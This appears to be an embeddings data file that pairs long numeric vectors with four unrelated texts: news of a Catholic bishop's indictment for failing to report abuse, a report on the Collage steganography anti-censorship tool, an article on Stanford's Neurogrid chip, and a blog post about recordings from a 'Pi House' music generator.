0.01532627735286951, 0.0902995690703392, -0.05170992761850357, 0.02575315348803997, 0.04151458293199539, -0.07271929085254669, -0.0003204960667062551, 0.002413730835542083, 0.0819377526640892, 0.04201002046465874, -0.03689906373620033, -0.04475327581167221, -0.0006079638842493296, 0.01573372073471546, 0.0018464556196704507, -0.016686497256159782, -0.04870560020208359, -0.12917309999465942, -0.030882731080055237, -0.04409317672252655, -0.015431990846991539, -0.11232252418994904, 0.008295269683003426, 0.03367375582456589, 0.05499228835105896, 0.0333639495074749, -0.014275356195867062, 0.022867005318403244, 0.00541540514677763, 0.06175503879785538, -0.05539361387491226, -0.01343546062707901, -0.051886603236198425, 0.09164098650217056, 0.06634711474180222, -0.057842474430799484, -0.0022602807730436325, 0.034157730638980865, 0.013650398701429367, 0.026024427264928818, -0.09036415815353394, 0.0258770938962698, 0.05033012107014656, 0.02412065863609314, 0.08440013229846954, 0.016497191041707993, 0.01965204067528248, 0.058339979499578476, -0.0125695476308465, -0.021955322474241257, 0.03647037595510483, -0.0883135050535202, -0.03677205368876457, 0.09715743362903595, 0.0629817545413971, 0.022706124931573868, 0.14088164269924164, 0.055237382650375366, -0.01619035005569458, -0.0190927442163229, 0.023494035005569458, -0.020554712042212486, -0.07092457264661789, 0.021192319691181183 ]
The Roman Catholic bishop of Kansas City has been indicted by a grand jury on charges that he covered up child abuse, the New York Times reports. Robert Finn is the highest-ranking member of the American church to face criminal charges related to child abuse. Authorities say Finn knew that one of his priests, Rev. Shawn Ratigan, had lewd photos of young girls on his computer, but Finn did not report Ratigan to the authorities for five months. According to the Kansas City Star, Finn re-assigned Ratigan to live in a mission house in Independence, Mo., after hearing complaints about his inappropriate behavior. Ratigan is accused of trying to take pornographic photos of a 12-year-old girl during his time there. Finn is affiliated with Opus Dei, a powerful and controversial organization within Catholicism, according to the Times. He pleaded not guilty to the misdemeanor charge. According to Agence France-Press, the sexual abuse crisis has cost the American branch of the Catholic Church $3 billion since the first allegations surfaced in the 1980s, though few people have been jailed for their crimes. The U.S. Conference of Bishops established a review board that found that "4,392 Catholic priests and deacons sexually abused at least 10,677 American children between 1950 and 2002," the AFP reports. Only 615 incidents were reported to civil authorities, with 252 clergymen convicted. Correction: An earlier version of this story incorrectly stated that the grand jury that indicted Bishop Finn was a federal jury. Other popular Yahoo! News stories: • CNN defends decision to broadcast Michael Jackson autopsy photo • Rick Perry believes he's being attacked because he's a Christian • Will the naked mole rate help humans live longer?
[ -0.0004483583616092801, 0.007881631143391132, -0.0687895342707634, 0.000863123219460249, -0.002395544433966279, 0.014006145298480988, 0.0015091310488060117, -0.01246054656803608, 0.032826535403728485, 0.06564285606145859, 0.04040415212512016, 0.051928192377090454, -0.08899013698101044, 0.04963114857673645, -0.04018360748887062, -0.03518538177013397, -0.031066270545125008, 0.08862893283367157, -0.008412178605794907, 0.115207739174366, -0.0530795119702816, -0.05179150030016899, 0.08283925801515579, -0.07109207659959793, 0.06282873451709747, 0.04082273319363594, 0.009523172862827778, -0.03618105128407478, -0.03672086074948311, -0.012256919406354427, -0.0017907193396240473, -0.04592207446694374, -0.033178627490997314, -0.022875996306538582, 0.03429482877254486, -0.030987557023763657, 0.04774937778711319, 0.04638339579105377, 0.021420786157250404, 0.027573218569159508, 0.04818139225244522, -0.0027728041168302298, -0.011319315060973167, 0.03991401195526123, -0.06941195577383041, 0.006515886168926954, -0.048807088285684586, 0.06542368233203888, -0.01751052774488926, -0.057438261806964874, 0.015144453383982182, -0.04467196390032768, 0.06870108842849731, 0.028060216456651688, -0.07922620326280594, -0.03154997155070305, -0.01931489072740078, -0.04499334096908569, 0.030198244377970695, 0.04494127258658409, -0.03715376555919647, 0.06777919828891754, -0.02820669859647751, 0.07032708078622818, 0.007958754897117615, 0.050110384821891785, -0.004365889355540276, -0.020258326083421707, 0.021547263488173485, 0.012769181281328201, 0.1452251821756363, -0.07177772372961044, -0.018294449895620346, -0.011055128648877144, -0.049418024718761444, 0.009634099900722504, 0.013742220588028431, 0.040312930941581726, 0.08607613295316696, -0.03282929211854935, 0.06405563652515411, -0.05531757324934006, -0.01890103705227375, -0.03020077385008335, 0.010576389729976654, -0.010192311368882656, 0.016589293256402016, -0.017945261672139168, 0.003294304944574833, 0.05065462365746498, 0.0042274086736142635, 0.05206960812211037, -0.004072971176356077, -0.15658792853355408, 0.07437607645988464, 0.036202166229486465, -0.011618359945714474, 0.06117214262485504, -0.07497693598270416, 0.0420885905623436, -0.08337372541427612, 0.07732560485601425, 0.02834225818514824, -0.055322952568531036, 0.06290510296821594, -0.024036340415477753, 0.11064337193965912, -0.017277617007493973, -0.014993666671216488, 0.03303826227784157, -0.0658932477235794, 0.03919453173875809, -0.09281689673662186, -0.07620545476675034, 0.1653711050748825, -0.031844574958086014, 0.12150266766548157, 0.04326462745666504, -0.0012310765450820327, -0.01199320424348116, 0.012418803758919239, 0.006115471012890339, -0.048666294664144516, 0.10896098613739014, -0.02552061155438423, -0.03658227249979973, -0.03080698288977146, 4.879981686314704e-34, 0.06084354221820831, -0.041053060442209244, -0.07185070216655731, -0.11327121406793594, 0.002760967006906867, 0.035754140466451645, 0.0014150793431326747, -0.05688370764255524, -0.03437696397304535, 0.06224913150072098, -0.04891825467348099, -0.0717962458729744, -0.03993147239089012, -0.11399339139461517, 0.013739311136305332, 0.08856893330812454, 0.03301848843693733, -0.003434705315157771, 0.02943721041083336, -0.004919213708490133, 0.07573576271533966, 0.00323475687764585, 0.04178111255168915, 0.13081976771354675, -0.02642185427248478, -0.08024919778108597, -0.029158174991607666, 0.007439364679157734, -0.023457825183868408, -0.0009953168919309974, -0.043384529650211334, 0.055847130715847015, 0.022558890283107758, 0.006489149294793606, 0.05851471424102783, 0.009239904582500458, 0.027961106970906258, 0.008032857440412045, 0.020877249538898468, 0.05689053609967232, -0.02907521277666092, -0.022463088855147362, 0.03018096089363098, 0.04733269661664963, -0.012681868858635426, -0.019047634676098824, -0.025657596066594124, -0.0992642343044281, -0.04252956807613373, 0.022307924926280975, 0.02583620883524418, 0.02833719179034233, -0.0226797703653574, -0.011924208141863346, -0.027252819389104843, 0.043642718344926834, 0.02658461593091488, 0.004717407748103142, 0.06456238776445389, 0.04669708013534546, -0.06541505455970764, 0.011420189402997494, -0.03711313381791115, -0.023039568215608597, -0.03472687676548958, -0.12320001423358917, -0.003939460963010788, 0.015070334076881409, -0.048387471586465836, -0.02036062441766262, 0.0067827156744897366, 0.015142882242798805, 0.021063484251499176, -0.12270916998386383, -0.02350270375609398, 0.0247432142496109, 0.0018076878041028976, -0.04053230583667755, -0.03434399142861366, 0.012957253493368626, -0.0464184433221817, -0.024623287841677666, 0.006525843404233456, 0.009101257659494877, 0.0463959276676178, -0.0012928555952385068, 0.058751221746206284, -0.00856684148311615, -0.02311878651380539, -0.0008972088107839227, 0.12522350251674652, 0.037976592779159546, -0.01111264806240797, -0.08247566968202591, 0.021273484453558922, -2.287904695281743e-33, -0.006382161285728216, -0.07049350440502167, 0.0030421351548284292, -0.020421182736754417, -0.04548019915819168, -0.06607860326766968, -0.10092588514089584, 0.05860620364546776, 0.047749947756528854, -0.0436425544321537, -0.0779823586344719, -0.11510085314512253, -0.05352875590324402, 0.029661359265446663, -0.015676219016313553, 0.017734628170728683, -0.0657445415854454, 0.02478528767824173, 0.010118985548615456, -0.05377821996808052, 0.04904012382030487, 0.09711910784244537, 0.022268718108534813, 0.13245658576488495, 0.03159352391958237, -0.04034329950809479, 0.08133791387081146, 0.051219236105680466, 0.0029837850015610456, -0.006136940326541662, 0.03648378700017929, 0.05660504847764969, 0.008382704108953476, 0.09700895100831985, 0.02489512972533703, 0.07298371940851212, 0.11014508455991745, 0.03157748281955719, 0.00876039732247591, -0.03575626388192177, 0.08833427727222443, 0.036288902163505554, -0.11599582433700562, 0.006821765564382076, -0.0421496219933033, -0.045478373765945435, 0.05977955088019371, 0.1077406257390976, 0.01444295048713684, -0.07103843986988068, -0.07512833178043365, -0.06470923870801926, -0.05529775470495224, 0.027323760092258453, -0.057316530495882034, 0.01402276661247015, -0.031417734920978546, -0.006085725501179695, 0.026022281497716904, 0.01545718777924776, 0.03479843586683273, -0.021955465897917747, -0.07213568687438965, 0.030022695660591125, 0.02150714583694935, -0.019422434270381927, -0.02501082234084606, -0.020056264474987984, -0.024755490943789482, 0.06484904140233994, -0.06866880506277084, -0.036118034273386, 0.046137735247612, 0.02566298097372055, 0.027640698477625847, -0.026742933318018913, 0.05981888622045517, -0.008970445021986961, 0.008872801437973976, -0.049982909113168716, 0.07938122749328613, -0.08866004645824432, -0.09231553971767426, -0.00793579500168562, 0.02533375471830368, -0.01889200508594513, 0.09853040426969528, -0.005208374001085758, -0.06240586191415787, -0.0003501011524349451, 0.03037765808403492, -0.06300006061792374, 0.006064631976187229, 0.009896360337734222, -0.019037630409002304, -4.8494165127976885e-8, 0.0014247759245336056, 0.06809263676404953, -0.01683078706264496, 0.0775577649474144, 0.13672548532485962, -0.014128896407783031, 0.03267832472920418, -0.028354531154036522, -0.002244904637336731, 0.0020186675246804953, -0.010366152971982956, 0.07308840751647949, 0.026265282183885574, -0.06465433537960052, 0.037484060972929, -0.006597327068448067, 0.001095349551178515, -0.04140381142497063, 0.011713000014424324, 0.02984222210943699, 0.009431225247681141, 0.01781577803194523, 0.00438492139801383, -0.005368136800825596, -0.0428234301507473, -0.021875843405723572, -0.022552911192178726, 0.08652294427156448, -0.041966523975133896, 0.03795721381902695, 0.02504054084420204, -0.017885198816657066, -0.050007302314043045, 0.0720498189330101, 0.033248186111450195, -0.05081745609641075, -0.10500623285770416, -0.00907991360872984, -0.039464615285396576, -0.047338515520095825, -0.055915746837854385, -0.04635285213589668, 0.013305320404469967, 0.033829402178525925, -0.07102043181657791, -0.029025794938206673, -0.05353323370218277, 0.04899809882044792, 0.06738165020942688, -0.06373656541109085, -0.05105004459619522, 0.0020474069751799107, -0.015225452370941639, 0.032100971788167953, -0.026120781898498535, -0.030743218958377838, 0.0996226966381073, 0.0477440170943737, -0.04650522768497467, -0.045700691640377045, -0.026962948963046074, -0.07319071143865585, 0.01239952351897955, -0.05168988183140755 ]
Life is about to become more difficult for countries trying to censor access to foreign websites. A system dubbed Collage will allow users in these countries to download stories from blocked sites while visiting seemingly uncontroversial sites such as Flickr. Collage relies on a well-established technique known as digital steganography, in which an image file is changed to encode the hidden message without obviously affecting the appearance of the image. A prototype version is due to be unveiled on Friday, 13 August. Steganography normally requires specialist software, but Collage is designed so that anti-censorship activists and readers can publish and download the hidden stories without any specialist skills. A publisher or activist can, for example, use Collage to copy news stories from a website and embed the articles into Flickr images in a process that is almost entirely automated. In the prototype, stories from the BBC news site are used, but in principle any web content could be hidden. Collage can hide as many as 15 news articles in just seven medium-sized Flickr images. Advertisement News feeds Once the material is embedded in a Flickr image, anyone with Collage can download it and extract the stories. A censor attempting to monitor traffic from a prohibited site would only see the reader visiting Flickr, which is not generally blocked by web censors. Collage is able to identify which images have been used to hide material. All the would-be reader has to do is click on the date they are interested in; the stories appear a few minutes later. “It all happens in the background,” says Sam Burnett at the Georgia Institute of Technology in Atlanta, part of the team behind Collage. Burnett has designed a Flickr upload tool that links with Collage and embeds content that publishers or activists want to make available. Collage can also be easily extended so that stories are embedded in other photo-sharing sites. The idea is to spread material across numerous sites that host user-generated content so that the activity of someone running Collage appears much like that of any internet user and the censors cannot just block access to Flickr. Collage does, however, rely on the goodwill of Flickr users, who will have to provide access to the images where the articles are to be hidden. Burnett is relying on opposition to censorship to motivate people to use Collage. “We’re betting on people getting a warm fuzzy feeling because they are beating censorship,” he says. To coincide with the launch of the prototype, Burnett will present a paper on the system at the USENIX Security Symposium in Washington DC.
[ -0.0676456019282341, -0.010250519961118698, -0.03689896687865257, -0.018465155735611916, 0.08471543341875076, -0.05346526578068733, -0.05785161629319191, -0.07501605153083801, 0.05254136398434639, -0.01999746449291706, 0.04556155949831009, 0.12427855283021927, 0.07020016014575958, 0.030399957671761513, -0.04082353413105011, -0.09889733046293259, 0.019987087696790695, 0.025547271594405174, -0.025503521785140038, -0.025096703320741653, 0.01604463905096054, -0.0696079432964325, -0.0173177532851696, -0.06008386239409447, 0.019801128655672073, -0.022176258265972137, -0.03840848430991173, -0.021225301548838615, 0.011324364691972733, -0.06341030448675156, 0.05226666107773781, -0.08129987120628357, 0.02483733370900154, 0.0071356045082211494, 0.032811056822538376, -0.032102081924676895, 0.03165344148874283, -0.0011193127138540149, 0.04286763817071915, 0.05629657581448555, 0.004720146302133799, -0.06061591953039169, 0.006733916699886322, 0.01521382201462984, 0.053122345358133316, -0.010549335740506649, -0.0075892978347837925, 0.07293669134378433, -0.05381257086992264, -0.04928454011678696, -0.02926492877304554, -0.05280090123414993, -0.02626677416265011, 0.03124564327299595, -0.06440005451440811, -0.1872527301311493, -0.014722011052072048, -0.019265783950686455, -0.047693055123090744, 0.023606102913618088, -0.04368959367275238, -0.009041734039783478, -0.007303785998374224, 0.005921375472098589, 0.027672648429870605, 0.046644143760204315, -0.01235158834606409, 0.02442055195569992, 0.09083789587020874, -0.00015596342564094812, -0.05619566887617111, 0.027923304587602615, -0.032402656972408295, 0.08681438118219376, -0.001339406706392765, -0.05567215383052826, 0.010982956737279892, -0.00005748819239670411, 0.0383564792573452, -0.06449765712022781, 0.09127837419509888, -0.03325750306248665, 0.08893691748380661, 0.008953344076871872, 0.00020423340902198106, -0.0005934233777225018, 0.00819881446659565, 0.020260823890566826, 0.020391404628753662, 0.000607054855208844, -0.07668346911668777, 0.012760305777192116, 0.08438310027122498, 0.0661555752158165, -0.04282700642943382, -0.05708223953843117, 0.03520142659544945, 0.032740794122219086, -0.002790594706311822, 0.0631219670176506, 0.006503756158053875, -0.014121646992862225, 0.06250137835741043, -0.0543908067047596, 0.024299882352352142, -0.001388611039146781, 0.011154241859912872, 0.04192427173256874, 0.02899414859712124, 0.058008890599012375, -0.05559021979570389, 0.06820250302553177, -0.0711575597524643, -0.08030664920806885, -0.0006222859374247491, -0.01494552195072174, 0.028652504086494446, 0.002789198188111186, -0.0006457106210291386, -0.008547107689082623, 0.03893666714429855, 0.013311351649463177, 0.009129524230957031, -0.04396333172917366, 0.04404322803020477, -0.023070745170116425, 0.01701527275145054, 5.01623957316775e-33, -0.00783843919634819, 0.0539388582110405, -0.05962252989411354, -0.003148662857711315, 0.018479904159903526, 0.004033941775560379, -0.013977336697280407, 0.006320481654256582, -0.06088976189494133, 0.020852921530604362, 0.02799282781779766, 0.01757900044322014, -0.010709683410823345, 0.08920217305421829, 0.07821650058031082, 0.01711304299533367, 0.01016972679644823, 0.048212405294179916, 0.056056346744298935, -0.03835819289088249, 0.09411881119012833, -0.08908549696207047, 0.051705047488212585, 0.024898827075958252, -0.018801536411046982, -0.015240432694554329, 0.009210384450852871, -0.06603482365608215, 0.08279077708721161, 0.04568979889154434, -0.042794257402420044, 0.021408647298812866, 0.05601440742611885, -0.017942387610673904, 0.06626330316066742, -0.04970506578683853, -0.021266154944896698, -0.10959472507238388, 0.06146049499511719, 0.0771591067314148, 0.016320373862981796, -0.04507743939757347, -0.01042768731713295, -0.04943244531750679, 0.010368245653808117, 0.07125193625688553, 0.019533701241016388, -0.02744673751294613, -0.06157459318637848, 0.028945131227374077, 0.08868483453989029, 0.05156378075480461, -0.0908791720867157, -0.07233170419931412, 0.011218640953302383, 0.062992624938488, 0.02615482546389103, -0.12883824110031128, 0.051610205322504044, -0.045432206243276596, 0.06991603225469589, 0.047026995569467545, 0.018410300835967064, 0.04947739839553833, -0.050126075744628906, -0.008460508659482002, 0.060660429298877716, -0.021732119843363762, -0.03010515868663788, 0.03494201600551605, -0.05668884143233299, -0.017697522416710854, -0.01846362091600895, -0.054160188883543015, -0.13749271631240845, 0.03289103880524635, 0.03484802693128586, 0.024378910660743713, 0.04308144375681877, 0.03984600305557251, -0.01821211166679859, -0.05787595734000206, 0.01507116574794054, -0.08799763768911362, -0.1009664461016655, -0.01677972450852394, 0.0240001380443573, -0.02473832480609417, 0.0068264310248196125, 0.049275707453489304, 0.001498288125731051, 0.029952144250273705, -0.09276259690523148, 0.043649401515722275, 0.012754176743328571, -4.319035873937804e-33, -0.11003503948450089, -0.008992594666779041, -0.06768963485956192, 0.0005779830389656126, -0.07312384992837906, -0.022550811991095543, -0.0014812853187322617, 0.03860144317150116, 0.07145591080188751, 0.0018002443248406053, -0.056970059871673584, -0.014825140126049519, -0.05910260230302811, -0.039333537220954895, -0.0531744509935379, -0.016430484130978584, 0.054947249591350555, -0.04988257586956024, -0.1761370450258255, 0.06826289743185043, -0.03054284118115902, 0.01705433428287506, -0.09479592740535736, 0.08586973696947098, 0.07479845732450485, 0.04093397408723831, 0.04559773951768875, 0.03312944993376732, 0.09246626496315002, 0.017894549295306206, -0.009533041156828403, -0.03276088461279869, 0.017902743071317673, -0.05963384732604027, -0.07040414214134216, 0.032154448330402374, 0.061643701046705246, 0.050919026136398315, 0.0005900591495446861, -0.0286543071269989, 0.02883216179907322, 0.0581313781440258, -0.08620870858430862, -0.016436206176877022, -0.07926349341869354, 0.007341255433857441, -0.06072675809264183, 0.06499708443880081, 0.06879888474941254, 0.03617200627923012, 0.07536943256855011, -0.04817402362823486, 0.018384678289294243, -0.033200930804014206, -0.01815226674079895, -0.004741126671433449, -0.07056257128715515, -0.008192256093025208, 0.026937508955597878, 0.04261225834488869, 0.06015479937195778, -0.027200400829315186, -0.14171850681304932, -0.05226656794548035, 0.0312030129134655, -0.023302767425775528, -0.05048295110464096, 0.04670313000679016, -0.11912842839956284, 0.08314221352338791, 0.09721152484416962, -0.015062213875353336, 0.07147397100925446, -0.05987130105495453, 0.06897985935211182, 0.02210421673953533, -0.02562052011489868, 0.07578928768634796, -0.06702566891908646, 0.020929206162691116, -0.027108069509267807, 0.0008788094855844975, 0.014551143161952496, 0.008620698004961014, 0.09626796096563339, 0.006686197128146887, -0.04537508636713028, -0.04230429232120514, 0.012001773342490196, -0.032889265567064285, -0.033319324254989624, 0.011497094295918941, -0.036673564463853836, 0.10714956372976303, 0.0723612830042839, -4.7685492887694636e-8, 0.0032649151980876923, -0.05124637857079506, -0.05827886983752251, -0.048492252826690674, -0.06369556486606598, 0.0018233365844935179, 0.02616705559194088, -0.06812281906604767, 0.014015061780810356, -0.057113006711006165, 0.07244054973125458, -0.034313544631004333, -0.030579617246985435, -0.003934862557798624, 0.006974625401198864, 0.030222946777939796, 0.004036863334476948, -0.049481458961963654, -0.0008298739558085799, -0.03173805773258209, -0.022587232291698456, -0.033604394644498825, 0.015540577471256256, -0.015171816572546959, 0.01962289959192276, 0.0025576227344572544, -0.011990945786237717, 0.002039662329480052, -0.004737313371151686, 0.05173484981060028, -0.05082382261753082, -0.002735401503741741, 0.023660697042942047, 0.0656491294503212, 0.020279118791222572, 0.0884908139705658, -0.003704293165355921, -0.02318352833390236, -0.06035486236214638, 0.07433877885341644, 0.08969130367040634, -0.06555290520191193, 0.03661313280463219, 0.024262748658657074, 0.0020049498416483402, -0.004870182368904352, 0.058748215436935425, -0.049978602677583694, 0.009069474413990974, 0.033370278775691986, -0.034969840198755264, -0.057833053171634674, 0.004069256130605936, 0.1007004901766777, 0.0472525991499424, -0.037347860634326935, 0.09102348238229752, -0.003697289852425456, -0.004199458286166191, 0.13105462491512299, 0.050491977483034134, -0.0714709609746933, 0.07568784058094025, 0.03319995850324631 ]
By modeling a circuit board on the human brain, Stanford bioengineers have developed microchips that are 9,000 times faster than a typical PC. Called Neurogrid, these energy-efficient circuits could eventually power autonomous robots and advanced prosthetic limbs. Bioengineers are smart to take inspiration from the human brain. It's a highly efficient information processor capable of crunching 100 million instructions per second (MIPS). Astoundingly, it only uses about 20 watts to power its 100 billion neurons. Today, our best supercomputers require a million watts to simulate a million neurons in real time (measured in terraflops). A standard desktop computer requires about 40,000 times more power to run and operates about 9,000 times slower. Advertisement The goal, therefore, is to produce information technologies with the power of the human brain. There are several initiatives underway that are working to achieve this goal, including IBM's neurosynaptic chips (and accompanying programming language), the University of Heidelberg's HICANN Chip, and brain-mapping initiatives like the European Human Brain Project. We can now add another project to the list: Stanford's Neurogrid. But unlike other current efforts, this "neuromorphic" system boasts some incredible energy-saving features. An Analog State of Mind The new circuit board, developed by Kwabena Boahen and his colleagues at Stanford, consists of 16 custom-designed "Neurocore" chips working in a tree network configuration. Each of the 16 Neurocores supports 65,536 neurons. Together, these chips can simulate one million neurons and billions of synaptic connections. And incredibly, Neurocore needs just three watts of power to get the job done. The designers used traditional transistors, but instead of using digital logic, they used them as analog circuits. To mimic the functions of the human brain (albeit on a drastically reduced scale), the researchers emulated all neural elements (except the soma) with shared electronic circuits — a design decision that maximized the number of synaptic connections. To maximize energy efficiency, the researchers used analog circuits. And to maximize throughput, they interconnected the neural arrays in a tree network. Advertisement It's considered the most cost-effective way to simulate neurons. But at $40,000 a piece, the researchers are going to have to figure out a way to drive the costs down. Miniaturization, Autonomy, Power Ramped-up and refined versions of this technology could be put to good use. In addition to improving our understanding of how the human brain works, it could be used to interpret signals from the brain and, in real time, use those signals to drive prosthetic limbs for paralyzed people. Advertisement These chips could also be used in robotics. A robot implanted with a Neurocore-like chip wouldn't have to be tethered to a power supply, thus increasing its autonomy. Read the entire study at Proceedings of the IEEE: "Neurogrid: A Mixed-Analog-Digital Multichip System for Large-Scale Neural Simulations." Supplemental information via Stanford. Image: Kurt Hickman/Stanford. Follow me on Twitter: @dvorsky
[ -0.010760925710201263, -0.03316514939069748, -0.014724799431860447, -0.03812596946954727, -0.0537848137319088, -0.08432634174823761, -0.01867617480456829, 0.0324440523982048, 0.03772573918104172, 0.03596079349517822, -0.022346967831254005, -0.00933737214654684, -0.045673541724681854, 0.01054646447300911, -0.06470035761594772, 0.051098037511110306, 0.029945582151412964, -0.0198774803429842, -0.025194993242621422, -0.01794755645096302, 0.060827963054180145, -0.020272398367524147, -0.014958017505705357, -0.0366726890206337, -0.011162376031279564, 0.04962562769651413, -0.027856647968292236, -0.08394359052181244, -0.016467100009322166, 0.01330032292753458, 0.05635642632842064, -0.044836871325969696, 0.022343462333083153, -0.032520592212677, -0.0063831196166574955, 0.05918557196855545, 0.006296553183346987, -0.08244074881076813, 0.01765901781618595, -0.00499695586040616, -0.05364461615681648, -0.08362115919589996, 0.03873760625720024, 0.09450663626194, 0.0596340112388134, 0.06020953133702278, 0.030093004927039146, -0.10483983159065247, -0.005846265237778425, -0.03470906987786293, -0.10743145644664764, -0.05967501923441887, 0.03804563358426094, -0.005270376801490784, -0.009484948590397835, 0.037878669798374176, -0.00780926737934351, -0.010402829386293888, -0.006573716178536415, 0.013223844580352306, -0.03145582973957062, -0.03503727540373802, 0.04904291033744812, -0.03149799257516861, -0.0038772032130509615, 0.04070201516151428, -0.006189852487295866, -0.06269016861915588, 0.05454835295677185, -0.013916741125285625, 0.04256870597600937, -0.02783821150660515, 0.013525357469916344, -0.009627120569348335, -0.03402644395828247, -0.036649852991104126, 0.007414915598928928, 0.01732977293431759, 0.16420237720012665, -0.07951989024877548, 0.059458572417497635, -0.019312484189867973, -0.05669928342103958, 0.007023859769105911, 0.1042560413479805, -0.013822908513247967, -0.016831424087285995, 0.13459141552448273, -0.02562987618148327, 0.015824103727936745, -0.04574474319815636, -0.062416281551122665, 0.01039342861622572, -0.04804606735706329, -0.03087581880390644, -0.03152231127023697, 0.005722366739064455, -0.015351731330156326, -0.028857972472906113, -0.008896024897694588, -0.019422059878706932, 0.06882265955209732, 0.04969867691397667, 0.0067264786921441555, -0.014744157902896404, -0.0066992552019655704, 0.03851401433348656, 0.08428562432527542, 0.06637256592512131, -0.013125482946634293, -0.0031956080347299576, 0.0372706800699234, -0.04924219474196434, 0.07147840410470963, 0.044891126453876495, -0.03086557425558567, 0.002012199256569147, 0.08302533626556396, 0.10382868349552155, 0.04742797836661339, -0.01651815138757229, -0.049267277121543884, -0.053318191319704056, -0.006624976173043251, 0.021293746307492256, 0.024152370169758797, -0.1237790510058403, 3.0735652627660275e-33, -0.043553318828344345, 0.026247316971421242, -0.003769777249544859, -0.019331680610775948, -0.02330581098794937, -0.037893153727054596, -0.014445737935602665, 0.001388269360177219, 0.03616102412343025, 0.026508087292313576, -0.041836950927972794, -0.003658666042611003, 0.019476521760225296, 0.1675737053155899, 0.08205241709947586, -0.068449467420578, -0.0601733960211277, -0.02758295275270939, 0.02831905335187912, -0.05615033209323883, 0.0877702385187149, -0.025640232488512993, 0.03385259956121445, -0.0013902386417612433, 0.04048963636159897, -0.02861986868083477, -0.058976612985134125, -0.01794241927564144, 0.02576955035328865, 0.0037761488929390907, -0.05368141457438469, -0.004340989049524069, -0.08049861341714859, -0.04413420334458351, -0.04145535081624985, -0.01964825578033924, 0.06688176095485687, -0.07617003470659256, 0.035024337470531464, 0.0838715210556984, -0.011066049337387085, 0.11430393904447556, 0.09413715451955795, -0.07473951578140259, -0.0067687672562897205, 0.05286760628223419, 0.006632327567785978, 0.028328558430075645, 0.03307711333036423, -0.09669312834739685, -0.025074757635593414, 0.0380338691174984, 0.028507735580205917, -0.007331507746130228, 0.11023373901844025, -0.011193067766726017, 0.034113988280296326, 0.06603880226612091, 0.13319243490695953, 0.15502148866653442, -0.053419746458530426, 0.011266683228313923, -0.004982077982276678, 0.04476115480065346, 0.057840220630168915, 0.0751926526427269, 0.039199844002723694, 0.07290630787611008, -0.02884831838309765, 0.03578634932637215, 0.025975098833441734, -0.05892837792634964, 0.01863551139831543, -0.10413814336061478, -0.0005326498649083078, 0.0021748885046690702, 0.04497280344367027, -0.04231266304850578, -0.14721207320690155, -0.0034233650658279657, -0.02884274162352085, 0.02983815409243107, -0.06260350346565247, -0.01783309131860733, 0.11723938584327698, 0.0670550987124443, -0.016126392409205437, 0.0415855310857296, -0.06153763830661774, -0.04208298400044441, 0.029224878177046776, -0.05811586230993271, 0.018950579687952995, -0.039001695811748505, -0.13753075897693634, -2.3395739168141213e-33, -0.11387460678815842, -0.05277641490101814, -0.027551576495170593, 0.08438342809677124, 0.05954589322209358, 0.010643001645803452, 0.019559243693947792, -0.04493095353245735, -0.07680680602788925, 0.0017266578506678343, -0.02192765846848488, -0.05525876581668854, 0.055626582354307175, -0.0037378075066953897, 0.027375226840376854, 0.004815889056771994, -0.0634148046374321, -0.052780695259571075, 0.02500043623149395, -0.024119766429066658, 0.04511583223938942, 0.12632456421852112, -0.03321636840701103, 0.014281940646469593, 0.010621506720781326, 0.02669726312160492, -0.10730686783790588, 0.009919548407196999, 0.028639374300837517, -0.026922397315502167, -0.07214957475662231, 0.012526514008641243, -0.04782705008983612, -0.008271551690995693, 0.06393936276435852, 0.024951303377747536, 0.02412332221865654, -0.02052469179034233, 0.0098078902810812, 0.009322269819676876, 0.12018375843763351, 0.0034081661142408848, -0.0640370175242424, 0.04201638698577881, -0.01815207675099373, 0.07506971806287766, -0.14322306215763092, -0.03544734790921211, -0.03486326336860657, 0.06596217304468155, 0.012755578383803368, -0.0019202871480956674, -0.08456813544034958, -0.07546552270650864, -0.028878627344965935, -0.0693938359618187, -0.035922031849622726, 0.025610944256186485, 0.025644950568675995, -0.03764037415385246, -0.003946043085306883, -0.05568717420101166, 0.03308878839015961, 0.024573426693677902, 0.002554478822275996, 0.07560110092163086, 0.038378119468688965, 0.11552134156227112, -0.03416630998253822, 0.0007356925052590668, -0.0019383879844099283, 0.020479653030633926, 0.03383450582623482, 0.017310786992311478, -0.004885104019194841, 0.07472951710224152, 0.005383061710745096, -0.043538957834243774, 0.008999927900731564, -0.024657607078552246, 0.030977070331573486, 0.005111319944262505, 0.024721553549170494, -0.04438012093305588, 0.04691287502646446, 0.03568330779671669, -0.018784787505865097, 0.002368079498410225, -0.020930927246809006, -0.04111365228891373, -0.0012381024425849319, 0.008772578090429306, 0.010813289321959019, 0.03278355300426483, -0.06041828170418739, -4.759002081300423e-8, 0.0372689887881279, 0.015399648807942867, 0.08847446739673615, -0.05892235040664673, 0.041921306401491165, -0.07515577226877213, 0.01273792888969183, 0.022191563621163368, -0.024060478433966637, -0.019457796588540077, 0.11799158900976181, -0.06773196160793304, 0.0049451678059995174, 0.08302461355924606, 0.0734953060746193, 0.09447329491376877, 0.023937473073601723, 0.04299384355545044, 0.018703289330005646, -0.04901569336652756, -0.014908297918736935, 0.023416366428136826, -0.001615710323676467, 0.04418347775936127, 0.014837958849966526, -0.02571221999824047, -0.01707826554775238, -0.01744549721479416, -0.02506043203175068, -0.043620310723781586, -0.04957215115427971, -0.016741951927542686, 0.016809087246656418, 0.058635614812374115, 0.07663262635469437, -0.08079806715250015, -0.028203625231981277, 0.00976115744560957, -0.019412165507674217, -0.01510993205010891, -0.06016616150736809, -0.06846613436937332, -0.05895129218697548, 0.013002078980207443, 0.01680784672498703, -0.04503248259425163, -0.10120167583227158, -0.0689358115196228, 0.014988036826252937, 0.08300065249204636, 0.015213989652693272, 0.014730940572917461, 0.02463284507393837, -0.018825123086571693, 0.004781270865350962, 0.06750224530696869, -0.05378743261098862, -0.036737047135829926, -0.014125172980129719, -0.006247506011277437, 0.045843880623579025, 0.0026078009977936745, 0.02358611486852169, -0.03916264325380325 ]
Since the Pi House Generator was posted on Make and some other places today and I’ve been meaning to do it for a while, I’m posting a longer sample of the program’s output. This mp3 is an hour and half randomly selected from a 10 hour recording I made recently (~100MB download). update: here is a torrent of the full 10 hours, please seed! update2: I’ve been told the torrent isn’t working. I can’t look into it now, but I’ll try again in a few days. update3: A bunch of people have emailed asking about getting a copy of the Pi House program. I may release it at some point, but it needs some work to be ready for public release and it currently only supports uncompressed samples, which means the samples take up over a gig. update4: Because I got dugg I had to temporarily remove the mp3s, I ran out of bandwidth. I’m looking for somebody else to host them… update5: mp3s back up.
